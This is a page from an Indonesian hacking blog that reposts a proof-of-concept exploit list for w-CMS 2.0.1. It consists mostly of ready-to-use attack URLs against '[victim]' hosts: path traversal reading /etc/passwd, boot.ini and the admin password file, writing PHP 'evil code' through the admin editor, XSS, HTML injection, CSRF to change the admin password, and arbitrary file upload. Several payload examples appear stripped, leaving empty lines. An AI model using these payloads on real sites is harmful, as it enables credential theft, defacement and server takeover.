Bloging,Seo,Tutorial,Tips and trick,Info Komputer, Hacking,cracking,crack,cara ngehack,hacking tools,how to hack,free download,free software,google dork,ilmu komputer dan seputar tekhnologi informasi semua nya ada disini
Tampilkan postingan dengan label exploit. Tampilkan semua postingan
Tampilkan postingan dengan label exploit. Tampilkan semua postingan
Selasa, 10 April 2012
w-CMS 2.0.1 Multiple Vulnerabilities
w-CMS 2.0.1 Multiple Vulnerabilities
PoC/Exploit:
1.# Local File Disclosure [LFD]
~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password
+----------------------------------------------------------------------+
2.# Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php
Just Fill The Text Area With Evil Code (Php) & Click Save
+----------------------------------------------------------------------+
3.# Cross Site Scripting (XSS)
~ [PoC]Http://[victim]/path/?p=
~ [PoC]Http://[victim]/path/index.php?p=
+----------------------------------------------------------------------+
4.# Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle :
++ You Can Inject Xss Too
Exapmle :
+----------------------------------------------------------------------+
5.# Cross Site Request Forgny (CSRF) Admin Change Pass
~ [PoC] Inject This Evil Code In Contact Form
+----------------------------------------------------------------------+
6.# Arbitary File Upload
~ [PoC]Http://[victim]/admin.php
# Add Folder
# Upload File
Langganan:
Postingan (Atom)